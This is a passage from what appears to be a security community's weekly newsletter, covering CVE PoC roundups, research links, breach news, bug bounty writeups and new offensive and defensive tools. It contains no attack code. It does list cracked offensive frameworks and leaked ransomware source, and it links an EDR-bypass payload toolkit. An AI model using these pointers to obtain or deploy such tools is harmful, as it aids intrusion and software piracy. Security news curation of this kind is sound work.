honeypot.](https://twitter.com/GossiTheDog/status/1575580072961982464)\n - 🟢 @XssMice Curated [Resources and Github Repos and Tools For Firmware security and Pentesting](https://twitter.com/XssMice/status/1579872661806514176?t=7MuNf_jhLwP27sQyhGGqSA&s=19)\n - 🟢 MalwareBazaar updated a [suspisious malware entry on Bumblebee](https://twitter.com/k3dg3/status/1575173131198558208)\n \n
\n \n
\n 4. Update on Data breach & Blackhat hackers Leaked 🔴 \n \n \n - 🔴 **Update - Paid Tools** that has been leaked or cracked by Black Hat Hackers : \n > Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1,Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense 3.1.2.0 (x32/x64) Licensed, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **Update - Black Hat Hacker leaked & activity** : \n - The source code of Intel Alder Lake processors has appeared on the web by Kingsman.\n > Intel has confirmed that some of the source code and internal documentation for Alder Lake has been leaked and clarified that the data from this leak, which has been published in public sources, is genuine.\n - On 12th Octuber, A tweet from @IANS claims that\n > Cybersecurity researchers said they have discovered a massive leak involving over nine million cardholders' financial data that includes customers of the State Bank of India (#SBI).\n - Pakistan Goup on twitter says that Indian government and military defence data mega leak \n > Includes all kinds of top secret, secret and confidential documents from the following sectors, ALISDA, DGAQA, MSQAA, DRDO,DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n - Goups and researcher on telegram & discord says that \"AZMA GROUP IS INVOLVED IN CLOSING THE INTERNET AND MONITORING SOCIAL MEDIA ALL OVER IRAN.\" \n - Reseachers have been discusinng about the *Darknetmarkets bible for buyers* guide that covers all steps that users have to take in order to buy\nsecurely from darknetmarkets.\n - Conti source code for v3.7.7, Ransomeware builder tools has been circulated around private group and Taurus bot source code has been leaked. \n \n
\n \n
\n\n5. Hiring/Jobs\n\n \n> In this beginners friendly segment, we talk about and share latest resources related to jobs in this month, interview questions and free trainning offered by organization, community and leader.\n \n - 1. Take a Look at [Internship/Job Opening in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n \n
\n
\n\n\n
\n 🐞🐞🐞 BUG BOUNTY 🐞🐞🐞 \n \n > Everything related to Bugbounty : report, witeups and resources👇\n \n\n
\n 1. Hackerone/Bugcrowd reports wroth reading for Bug Hunters. \n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n - 🐞 $33,510 on Gitlab for [Remote Command Execution via Github import](https://hackerone.com/reports/1679624)\n - 🐞 $1,000 on LinkedIn for [IDOR - Delete technical skill assessment result & Gained Badges result of any user](https://hackerone.com/reports/1592587)\n
\n \n
\n2. BUG BOUNTY : writeups, tips & resources. \n \n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n - **Writeups** :\n - [What I learnt from reading 220 IDOR bug reports.](https://medium.com/@nynan/what-i-learnt-from-reading-220-idor-bug-reports-6efbea44db7)\n - [Full Company Building Takeover](https://omar0x01.medium.com/company-building-takeover-10a422385390)\n - [How Palantir Manages Continuous Vulnerability Scanning at Scale](https://blog.palantir.com/how-palantir-manages-continuous-vulnerability-scanning-at-scale-9fbe25039ff5)\n - @HasharMujahid wrote a writeup explaining [Multi-Factor Authentication Vulnerabilities](https://infosecwriteups.com/multi-factor-authentication-vulnerabilities-7a4b647a7b09)\n - An detailed article on [SSRF vulnerabilities and where to find them](https://labs.detectify.com/2022/09/23/ssrf-vulns-and-where-to-find-them/)\n - [Fuzzing for Bug Bounty Hunting](https://maheshbasnet.medium.com/how-fuzzing-can-boost-you-bug-bounty-career-49e499900aa9)\n - [Persistent PHP payloads in PNGs: How to inject PHP code in an image – and keep it there](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)\n - [Exploits Explained: 5 unusual authentication bypass techniques](https://www.synack.com/blog/exploits-explained-5-unusual-authentication-bypass-techniques/)\n - [TWO LINES OF JSCRIPT FOR $20,000 – PWN2OWN MIAMI 2022](https://trenchant.io/two-lines-of-jscript-for-20000-pwn2own-miami-2022/)\n - $50K+ bounty for Worldwide [Server-side Cache Poisoning on All Akamai Edge Nodes ](https://medium.com/@jacopotediosi/worldwide-server-side-cache-poisoning-on-all-akamai-edge-nodes-50k-bounty-earned-f97d80f3922b)\n - [IDOR in GraphQL Query Leaking Private Photos of a Million $ App](https://rashahacks.com/idor-in-graphql-query-leaking-private-photos-of-a-million-app-2c12c7e9dea7)\n \n - **New Resources Found + Non -Technical**\n - @zapstiko curated a Bug bounty [Collected resource from twitter](https://github.com/zapstiko/Bug-Bounty)\n - [Pentagon bug bounty program turns up nearly 350 vulnerabilities](https://therecord.media/pentagon-bug-bounty-program-turns-up-nearly-350-vulnerabilities/)\n - TikTok Shop — [User disclosure bug execution](https://medium.com/@Ksecureteamlab/tiktok-shop-user-disclosure-bug-execution-7d1c1302b7cb)\n - [Cool Job : I(@Arl_rose) Recruit Pentesters for HackerOne](https://www.codecademy.com/resources/blog/cool-coding-job-hackerone-pentesting-community/)\n - [What does it mean to become an Intigriti partner](https://blog.intigriti.com/2022/10/04/become-intigriti-partner/)\n\n
\n \n
\n3. Bug Bounty HELPDESK by ResetHacker Community.\n
\n \n - [Bug Bounty FAQ](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/bugbounty-FAQ.md)\n - [Bug bounty Setup & hacker daily utiliy](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/setup/Readme.md) \n - [Bug Bounty Resources, recon methodology worldlist, mindmaps, checklists etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/Bugbounty)\n \n
\n\n \n\n \n \n
\n 🛠️🛠️🛠️ NEW TOOLS FOUND 🛠️🛠️🛠️ \n \n > List of tools that satisfy the hacker purpose in every domain.👇\n \n\n> Community members test the tools and we filter out most demanding and helpful tools that satisfy the hacker Purpose in different domains.\n\n
\n1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting - 6 Tools\n \n - **1. SAST/DAST/IAST/RASP/Recon/Network/Web Pentesting** - 6\n \n - [Cpplumber 0.1.0 - Static analysis tool based on clang, which detects source-to-binary information leaks in C and C++ projects.](https://github.com/ergrelet/cpplumber)\n - [UseReFuzz](https://github.com/root-tanishq/userefuzz) -> SQLI Tester for HTTP Headers, by [Kun](https://twitter.com/root_tanishq)\n - [Mizusawa](https://github.com/0x727/ShuiZe_0x727) -> Information Gathering Automation Tool.\n - [WARF](https://github.com/iamnihal/warf) -> A Web Application Reconnaissance Framework that helps to gather information about the target.\n - [spk aka spritzgebaeck](https://github.com/dhn/spk)\n > A small OSINT/Recon tool to find CIDRs that belong to a specific organization]\n - [dnsReaper](https://github.com/punk-security/dnsReaper) -> subdomain takeover tool for attackers, bug bounty hunters and the blue team!\n
\n\n
\n2. Cloud Security - 3 Tools \n \n - **2. Cloud Security** - 3\n - [CloudFox](https://github.com/BishopFox/cloudfox) -> Automating situational awareness for cloud penetration tests. \n - [cloudvelo](https://github.com/Velocidex/cloudvelo) -> An experimental Velociraptor implementation using cloud infrastructure.\n - [Cloudlist](https://github.com/projectdiscovery/cloudlist) -> A multi-cloud tool for getting Assets from Cloud Providers. \n > This is intended to be used by the blue team to augment Attack Surface Management efforts by maintaining a centralized list of assets across multiple clouds with very little configuration efforts.\n
\n\n
\n3. Blue/Red/Purple Team, IR and Threat intelligence - 6 Tools \n \n - **3. Blue/Red/Purple Team, IR and Threat intelligence Tools** - 5\n - [Headless Strike](https://github.com/CodeXTF2/cobaltstrike-headless)\n > It is a Aggressorscript that turns the headless aggressor client into a (mostly) functional cobalt strike client. \n - [Freeze](https://github.com/optiv/Freeze) is a payload toolkit for bypassing EDRs using suspended processes, direct syscalls, & alternative execution methods.\n - [fingerprintx is a Standalone utility for service discovery on open ports!](https://github.com/praetorian-inc/fingerprintx)\n - [Varc - Volatile Artifact Collector](https://github.com/cado-security/varc) \n > varc collects a snapshot of volatile data from a system. It tells you what is happening on a system, and is of particular use when investigating a security incident.\n - [LDAP Nom Nom - anonymously bruteforce Active Directory usernames at high speed](https://github.com/lkarlslund/ldapnomnom)\n > which allows you to anonymously bruteforce Domain Controllers to find usernames in Active Directory at high speeds.\n - [exploits-predict](https://github.com/wisoffe/exploits-predict) \n > Predicting the probability of an exploit being released after a CVE is published (by Machine learning algorithm) and this project is based on [Cookiecutter data science project template.](https://drivendata.github.io/cookiecutter-data-science/)\n\n
\n\n
\n4. Reverse Engineering, Encryption & OSINT - 5 Tools \n \n - **4. Reverse Engineering & OSINT Tools** - 4\n - [Shellcrypt](https://github.com/iilegacyyii/Shellcrypt) \n > It is a single-file cross-platform quality of life tool to obfuscate a given shellcode file and output in a useful format for pasting directly into your source code.\n - A simple [shell script (almost) POSIX for mail security checks](https://github.com/jeffbencteux/mailsecchk)\n - [PE-bear](https://github.com/hasherezade/pe-bear) is a multiplatform reversing tool for PE files. \n > It's objective is to deliver fast and flexible “first view” for malware analysts, stable and capable to handle malformed PE files.\n - [uosint](https://github.com/uosint-project/uosint) -> Find The Profiles Of A Person On Social Networks. \n - [TRIFECTA](https://github.com/V1XX-1/TRIFECTA-Search-Tool) \n > A batch script that allows you to search a phrase or keywords with 12 different search engines. You can do so one at a time or all at once. \n\n
\n\n
\n5. IoT, OS & Hardware - 3 \n \n - **5. IoT, OS & Hardware** - 3\n \n - [CiLocks](https://github.com/tegal1337/CiLocks) -> Crack Interface lockscreen, Metasploit and More Android/IOS Hacking.\n - [Cotopaxi](https://github.com/Samsung/cotopaxi) \n > Set of tools for security testing of Internet of Things devices using specific network IoT protocols.\n - [HKSSY/Drone-Hacking-Tool](https://github.com/HKSSY/Drone-Hacking-Tool) \n > Drone Hacking Tool is a GUI tool that works with a USB Wifi adapter and HackRF One for hacking drones.\n\n
\n
\n\n---\n \n
\n 🤝🤝🤝 Team/Contributor and Community Engagement patners and resources that help drafting Weekly Infosec Update.🤝🤝🤝 \n\n> Huge thanks to our awesome [Community Leader for contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n - Contributors : Good Resources Share, Paul miller, Tarang Parmar, Tuhin Bose, Vikram and Alexandre ZANNI.\n\n> I'm very grateful to all the [Organization, group, and community that support us for the engagement](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/CommunityEngagementPartners.md). Without their support distributing \"Weekly InfoSec Update\" among hackers would not have been possible.\n\n> Resources from [Organization and researchers](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md) that help us drafting [Weekly infosec Update](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate./md).\n\n
\n \n ---\n\n#### Wrapping Up\n

\n \n
\nHave questions, Suggestions, feedback or want to contribute? Just reply directly to mail (resethackeroffical@gmail.com), I'd love to hear from you.\n\nIf you find this update useful and know other people who would too, I'd really appreciate if you'd forward it to them ?? Thanks for reading!\n \n \n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_10.md", "content": "#### Hey Hackers, I hope you’ve been doing well on the weekend! and quote of Week is \"Don't rush the Process. Good Things Take Time.\"\n > Here are the agenda for *Weekly infosec Update v0.7* : **12th October- 18th October 2022**\n \n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) \n\n**Tips to SAVE TIME & How to READ this Newsletter? 👇**\n- Select the topic from the **Navbar** bellow and click on **Summary/Preview** and **Arrow (>)** to see the Details:\n\n- Open all relevant Title in New Tab (Ctrl+Click) then READ it one by one.\n\n[![cve poc](https://img.shields.io/badge/-CVE-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-cve) [![research & Business](https://img.shields.io/badge/-Research-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-research) [![beginners](https://img.shields.io/badge/-News-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-beginners) [![bug bounty](https://img.shields.io/badge/-Bug%20Bounty-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-bb) [![tools](https://img.shields.io/badge/-Tools-%232C4C9C?style=for-the-badge&logo=github&logoColor=black)](#title-tools) \n\n![WIU_Trail_Pro](https://user-images.githubusercontent.com/25515871/191970244-14b8821b-acd9-4fb6-8e9b-f627392c4715.png)\n \n---\n\n\n### 🪲🪲🪲 CVE : poc exploit and cve analysis 🪲🪲🪲\n\n### Week -> [**12th October- 18th October 2022**👈](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n\n \nSecurity patched within a week: \n \n > We have tracked the latest Security advisory of top vendors and filter out high and critical vulnerability that has been patched.\n > In this week, we have update from Apple(iOS), Adove, microsoft (55+), Github (sqlite3 & aws), Google(android), Ubuntu 22.04, 20.04 LTS, 18.4.\n\n\n\nCVE analysis, writeups and reports: (a total of 6 analysis that matter in last 1 week)\n \n > This week, we have collected the recently discovered write-ups for cve that have critical or higher severity. \n\n\n \n Poc for cve & exploit (a total of 5+ new 0-day in this week and 4 important from CVE last week) :\n \n > Every week, we're tracking the recetly discovered exploit and poc for cve and exploit. \n\n\n
\nSummary/Preview\n \n > Week -> [**12th October- 18th October 2022**👈](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md).\n \n\n \n CVE:ANALYSIS & POC: Poc for CVE-2022-40684 & Nuclei template, CVE-2022-41033, CVE-2022-36067, CVE-2021-45067, CVE-2022-42889/ Text4Shell \n and Detailed Report of Top cves most used by Chinese state-sponsored cyber actors since 2020 \n\n \n CVE POC (0-Day): CVE-2021-46422(google crome), CVE-2022-41852, CVE-2021-45067, Poc for CVE-2022-40684 & Nuclei template, \n CVE-2022-41033, Zeroday Microsoft Exchange Server checker (Virtual Patching checker), DropBox-XPC-Exploit, \n \n\n
\n\n---\n\n\n### 🔍🔍🔍 RESEARCH, SECURITY & IT ORGANIZATION 🔍🔍🔍\n\n > In this segment, We have collected relevant and latest article/whitepaper/research/technique/resources this week from all the infosec domains for independent researcher and professionals those who want to stay upto date with latest security, looking for a new approach to find CVE/bug, want to track the Infosec market and startups. \n
\n1 - Infosec Business, funded and Market \n \n - **1 - Infosec Business, funded and Market** \n \n - According to Mike P creator of Return on Security, Cybersecurity funding continued its downward trend in Q3 2022.\n > Both overall volume of transactions and total amount of money raised took a hit. What is interesting, however, is that while the total funding volume is down, the average funding round check size is still on par with 2021 to the tune of $29.1M in 2022 compared to $29.8M in 2021. Q4 2021 saw a rebound in transaction volume and money, and based on how October has started, this trend appears to be happening again in 2022.\n ![image](https://user-images.githubusercontent.com/25515871/196684987-be055136-822b-4293-b99d-cab307e59150.png)\n\n \n - CISA Releases [Twenty-Five Industrial Control Systems Advisories](https://www.cisa.gov/uscert/ncas/current-activity/2022/10/13/cisa-releases-twenty-five-industrial-control-systems-advisories)\n - The MRA market report reveals that [Global Cloud security market forecast to surpass $123 billion by 2032](https://www.techrepublic.com/article/cloud-security-market-forecast/)\n - The Latest [Funding News and What it Means for Cyber Security in 2023](https://thehackernews.com/2022/10/the-latest-funding-news-and-what-it.html)\n \n - **Infosec Market Helpdesk** \n \n > [Supply chain security Report](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n \n > [5G Cybersecurity Market to See Incredible Growth By 2022-2028](https://www.openpr.com/news/2753049/5g-cybersecurity-market-to-see-incredible-growth-by-2022-2028)\n \n > This research share the insight of [Indian Market, client and help you understand who is right client for your business](https://drive.google.com/file/d/1yRuIGqb5gcWN_F_tgqHgZA7RuLr34sIS/view?usp=sharing) \n \n > Investers and Venture capital(VC) for cybersecurity STARTUP : [Liberty City Ventures](https://www.libertycityventures.com/), [Evolution Equity](https://evolutionequity.com/), [M12VC](https://m12.vc/), [Team8.VC](https://team8.vc/), [Centerstone Capital](https://www.centerstone.capital/), [Insight partners](https://www.insightpartners.com/), [World Trade Venture](http://worldtradeventures.com/), [Menara Venture](https://menaraventures.com/) etc.\n \n
\n \n
\n 2. Research/Article discussed by professionals or independent researchers \n \n - **1 - Web Security and android security**\n \n - SANS released a survey [Think Like a Hacker: Inside the Minds and Methods of Modern Adversaries | September 2022](https://drive.google.com/file/d/1LiandSv7-TNGpzY5IsUzPNDReDVTiJgl/view?usp=sharing)\n - Ofer Maor, CTO, Mitiga shows the [consern over 2FA and recomend 3FA after Uber breach](https://www.helpnetsecurity.com/2022/10/11/2fa-is-over-long-live-3fa/)\n - Exploits Explained: [5 unusual authentication bypass techniques](https://www.synack.com/blog/exploits-explained-5-unusual-authentication-bypass-techniques/)\n - [What is wrong with Apple Passkeys?](https://medium.com/@arkenoi/what-is-wrong-with-apple-passkeys-1d044072c5a3)\n - [All Windows versions can now block admin brute-force attacks](https://www.bleepingcomputer.com/news/microsoft/all-windows-versions-can-now-block-admin-brute-force-attacks/)\n\n - **2 - Cloud Security & Automation**\n - [Snky Announcing the 2022 State of Cloud Security report](https://snyk.io/blog/2022-state-of-cloud-security-report/) \n - [Cloud security report by Fortnite](https%3A%2F%2Fwww.fortinet.com%2Fcontent%2Fdam%2Ffortinet%2Fassets%2Fanalyst-reports%2Freport-2022-cloud-security.pdf)\n - [GCP Penetration Testing Notes](https://0xd4y.com/2022/10/01/GCP-Penetration-Testing-Notes/)\n \n \n - **3 - Blue/Red/Purple/Threat Intelligence Team**\n - **Blue Team**\n - [Active directory Security report 2022](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n - [Kerberos Diamond and Sapphire Tickets](https://pgj11.com/posts/Diamond-And-Sapphire-Tickets/)\n > As you may known, one of the approaches for persistence in a Windows Active Directory are the well-known techniques Golden Ticket and Silver Ticket. \n - [Trace Oddity: Methodologies for Data-Driven Traffic Analysis on Tor](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing)\n > The paper presents a new end-to-end (e2e) correlation attack on Tor users, which helps to analyze network traffic more effectively to deanonymize them. To implement the attack, [Tensorflow version 2.2.0](https://pypi.org/project/tensorflow/2.2.0/)\nand [Keras version 2.3.0-tf](https://github.com/keras-team/keras/releases/tag/2.3.0) were used to implement their own deep learning model, as well as rewritten for the needs of [DeepCorr 6](https://github.com/woodywff/deepcorr), which was previously used to implement correlation attacks on Tor. \n \n - [Building a Holistic Insider Risk Management Program](https://drive.google.com/file/d/1jAlNYwuPdZ-UWlawyTDCqGvRduHFZdDN/view?usp=sharing)\n > This article explain Why companies should think about insider risk as part of their data protection strategy with a holistic approach that includes the right people, processes, and training, in addition to the appropriate tools.\n \n - **Red Team**\n - [Alchemist: A new attack framework in Chinese for Mac, Linux and Windows](https://blog.talosintelligence.com/2022/10/alchimist-offensive-framework.html)\n > Cisco Talos has discovered a new single-file command and control (C2) framework the authors call \"Alchimist [sic].\" Talos researchers found this C2 on a server that had a file listing active on the root directory along with a set of post-exploitation tools.\n - [Transform P3 P4 P5 vulnerabilities to P1](https://www.acceis.fr/transform-p3-p4-p5-vulnerabilities-to-p1/) \n > Article by ACCEIS explaining how to steal user sessions by chaining low risk vulnerabilities.\n - [Hidden DNS resolvers and how to compromise a fully-patched WordPress instance](https://sec-consult.com/blog/detail/melting-the-dns-iceberg-taking-over-your-infrastructure-kaminsky-style/)\n \n - **4. HelpDesk**\n - [Pentesting HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/PentestingReports/Readme.md) By Resethacker Community\n - [System Architecture For Cyber Security](https://medium.com/codingwizards/system-architecture-for-cyber-security-b15d09e7869)\n
\n\n---\n\n### Friendly Segment\n > We have tried to solve the problem \"How to stay upto date with latest Bug Bounty Community without wasting time on social media\" and this segment is friend for Intermidiate bug hunters and ethical hacker where NEWS and TOOLS segment are common for professional and intermidiate.\n
\n \n📰📰📰 Hacker NEWS 📰📰📰 \n \n > Based on hacker requirenment, we have reseted infosec news into 5 differrent segment👇\n \n\n
\n 1. Top 6 infosec news \n \n - News from bloomberg says that US Official Sees More Aggressive Cybersecurity Threats in Asia.\n - Germany fires cybersecurity chief 'over Russia ties'\n - USA released their [National Security Strategy](https://drive.google.com/file/d/1FdPbmXiQBuWz7hXM3h3S3Ubb09vZgrHK/view?usp=sharing)\n > It talk about the plans, alies and partners of USA in every region of the world.\n - Kaspersky researchers warns that [YoWhatsApp, Unofficial whatsapp app spreads the Triada Trojan](https://securityaffairs.co/wordpress/137013/malware/yowhatsapp-fake-whatsapp.html)\n \n - India mobile Export crosses 1 billion per month.\n - More than 7 in 10 cybersecurity incident responders in India say they have experienced extreme or considerable mental strain as a result of responding to a major hacking incident, reveals an IBM study. \n \n \n
\n \n
\n 2. Event recap \n \n > This Week Haxacon 2022 and Nullcon Goa conference 2022 videos & slides was mainly trending among community and we have collected public available important Talk, Slides, Tools, Podcast, Videos, upcomming events related to conferences, talks & webinars so you don't miss it and watch them, at a time that suits you.\n\n - **Conferences**\n \n - Haxacon 2022 : [Hacking the Cloud With SAML](https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG-ZZdMXn/view?usp=drivesdk)\n \n - [Nullcon Goa Conferences 2022 talk playlist](https://www.youtube.com/watch?v=Ut3yGqqg9W8&list=PLWv48qIcomCZVhwxDnEUmxJ8bfkTQsRPa) \n > Where you'll find talk and panel discussion such as CXO Panel discussion on Secure Service Edge (SSE): Challenges & Upsides of Adoption, Tzah Pahima talks on Breaking Formation: From an Error Message to Internal AWS Infra, Alexander Popov finding and view point as Kernel Hacker on Fuchsia OS and Anto Joseph talk on different bridge designs, their security trade-offs, vulnerabilities that may exist in these designs, and best practices for end-users and developers etc.\n \n - **Webinars and videos**\n - How [CIA spies Spread Denferous propaganda on Youtube](https://youtu.be/fKNAXLX6pKg)\n - Podcast [Two CISOs discuss the conviction of ex-Uber CISO](https://open.spotify.com/episode/4NqI0eXvLFlb5Dnxc0PdU7) \n > Andrew Monaghan had Ben Halpert, the CISO of Groupon, and myself on the Sales Bluebird podcast to talk about what the sentencing could mean for the cybersecurity industry\n - Swiggy 2nd largest food delivery services in India [invitng drone company to be the partner for Warehouse delivery with drone.](https://youtu.be/P58h6sy25WQ)\n - APISSEC University is hosting a live discussion with API security experts from U.S. Bank and WeWork on October 20th at 12pm ET for a discussion on [The 3 Pillars of API Security: Governance, Testing and Monitoring. you can register here.](https://my.demio.com/ref/8SgjSd5ekemBWh5d)\n \n\n - **Ongoing/Upcomming 𝙀𝙑𝙀𝙉𝙏𝙎**: \n \n - CISO visions : 17th to 21st October | Virtual – English \n - Mandiant mWISE Cybersecurity Conference 2022 : 18th-20th October | Washington DC \n - E-crime & Cybersecurity London : 19th October | London, UK \n - 7th Annual Counter Insider Threat Symposium : 19th October | Maryland \n - IT-SA : 25th to 27th October | Nuremberg, DE \n\n
\n \n
\n 3. Twitter Threads, News, Anouncement & Tips 🟢\n \n \n - Announcement📣 :\n - CISAgov released [RedEye](https://twitter.com/USCERT_gov/status/1580908416414863366)\n > An interactive open-source analytic tool developed w/@PNNLab to visualize & report #RedTeam command & control activities. RedEye lets users assess complex data, evaluate mitigation strategies & more: \n - Reseachers says that [XTREME PENTESTING Telegram group Scamming people by Selling Hackthebox halloween vouchers (Annual VIP+) that are currently free on Hackthebox for 1 month.](https://twitter.com/devil8731/status/1580527828277530624?t=q6soTWAwigM7OYEIIzpmNw&s=19)\n \n - Threads, Resources, News & Tips:\n \n - Greg Linares created a thread discussing [a real world breach involving a drone delivered exploit system that occurred this summer](https://twitter.com/laughing_mantis/status/1579550302172508161)\n - Froggy Trying to [build an 𝗢𝗽𝗲𝗻-𝘀𝗼𝘂𝗿𝗰𝗲 𝗔𝘁𝘁𝗮𝗰𝗸 𝗦𝘂𝗿𝗳𝗮𝗰𝗲 𝗔𝗻𝗮𝗹𝘆𝘀𝗶𝘀 𝗧𝗼𝗼𝗹](https://twitter.com/iamthefrogy/status/1581768423649837056)\n - @Shreky shared a thread to Learn \n > IDOR (Insecure Direct Object Reference) : [how to test for IDORs step by step on real #bugbounty programs.](https://twitter.com/shrekysec/status/1580890598542045186)\n \n > XSS (Cross Site Scrupting) -> [how to test for #XSS step by step on real #bugbounty programs.](https://twitter.com/shrekysec/status/1577764184137338901)\n - [30 cybersecurity search engines for researchers](https://twitter.com/danielmakelley/status/1581774745791385600) by denial Kelley\n\n \n
\n \n
\n 4. Update on Data breach & Blackhat hackers Leaked 🔴 \n \n \n - 🔴 **Update - Paid Tools** that has been leaked or cracked by Black Hat Hackers : \n > Cobaltstrike 4.7.1 Licence, CANVAS 7.27, Invicti Standard 6.7.0.37625, acunetix_14.9.220913107, BurpSuite_pro_v2022_9.1,Acunetix Version 14 build 14.9.220713150 for Windows, Nessus Core + tenableSC 20220307 ISO & Linux, Malcat malware analyzer, xray_1.9.1_windows_x64, WinLicense 3.1.2.0 (x32/x64) Licensed, bruteratel 1.2.2, and 010 Editor 13.0-beta2.\n \n - 🔴 **Update - Black Hat Hacker leaked & activity** : \n - Mango Markets to pay $47 million to hacker and drop criminal prosecution and The hack was the sixth largest DeFi exploit in history, trailing the $130 million Cream Finance hack.\n > The community of the DeFi platform Mango Markets voted in favor of the agreement with the hacker. He will return the $69 million and keep the remaining $49 million as a reward. Recall earlier Mango's credit protocol on Solana was hacked. According to preliminary estimates, the hacker managed to get more than $100 million.\n - The source code of Intel Alder Lake processors has appeared on the web by Kingsman.\n\n - On 12th October, A tweet from @IANS claims that\n > Cybersecurity researchers said they have discovered a massive leak involving over nine million cardholders' financial data that includes customers of the State Bank of India (#SBI).\n - We have verified the Indian government and military defence data mega leak \n > Includes all kinds of top secret, secret and confidential documents from the following sectors, ALISDA, DGAQA, MSQAA, DRDO,DDP, Joint Defence Secretary India, BSF, MOD and the Indian Navy.\n - Conti source code for v3.7.7, Ransomeware builder tools has been circulated around private group and Taurus bot source code has been leaked. \n \n
\n \n
\n\n5. Hiring/Jobs\n\n \n> In this beginners friendly segment, we talk about and share latest resources related to jobs in this month, interview questions and free trainning offered by organization, community and leader.\n \n - 1. Take a Look at [Internship/Job Opening in October 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n - 2. Here ResetHacker have collected [Interview Questions asked by organization](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n - 3. [Cybersecurity Jobs HelpDesk](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)\n \n
\n
\n\n\n
\n 🐞🐞🐞 BUG BOUNTY 🐞🐞🐞 \n \n > Everything related to Bugbounty : report, witeups and resources👇\n \n\n
\n 1. Hackerone/Bugcrowd reports wroth reading for Bug Hunters. \n \n *1. In This Segment, We have filtered out Top **HACKERONE/BUGCROWD REPORT** for Bug Hunters :*\n - 🐞 $33,510 on Gitlab for [Remote Command Execution via Github import](https://hackerone.com/reports/1679624)\n
\n \n
\n2. BUG BOUNTY : writeups, tips & resources. \n \n *2. In This Beginners friendly segment, We collect and filter out **BUG BOUNTY WRITEUPS, TIPS & RESOURCES*** \n \n - **Writeups** :\n - [The Ultimate Guide to Finding Bugs With Nuclei by projectdiscovery](https://blog.projectdiscovery.io/ultimate-nuclei-guide/)\n - [CSP and Bypasses](https://www.cobalt.io/blog/csp-and-bypasses)\n > This blog post aims to demonstrate what CSP is and why CSP is implemented. And how attackers can bypass CSP. In this article, I will include how you can bypass some directives to achieve XSS on the target application.\n \n - [Facebook SMS Captcha Was Vulnerable to CSRF Attack](https://lokeshdlk77.medium.com/facebook-sms-captcha-was-vulnerable-to-csrf-attack-8db537b1e980)\n > This post is about an bug that @lokesh found on Meta (aka Facebook) which allows to make any Endpoint as POST request in SMS Captcha flow.\n - An instagram [Blind Insecure Direct Object Reference (IDOR) Leads To Export Other User's Data](https://nobugescapes.com/blog/blind-insecure-direct-object-reference-idor-leads-to-export-other-users-data/)\n - [Sajan bhujel blog about \"How I Got $10,000 From GitHub For Bypassing Filtration oF HTML tags\". @GitHubSecurity](https://saajanbhujel.medium.com/how-i-got-10-000-from-github-for-bypassing-filtration-of-html-tags-db31173c8b37)\n - [What I learnt from reading 220 IDOR bug reports.](https://medium.com/@nynan/what-i-learnt-from-reading-220-idor-bug-reports-6efbea44db7)\n - [Full Company Building Takeover](https://omar0x01.medium.com/company-building-takeover-10a422385390)\n \n - **New Resources Found + Non -Technical**\n - 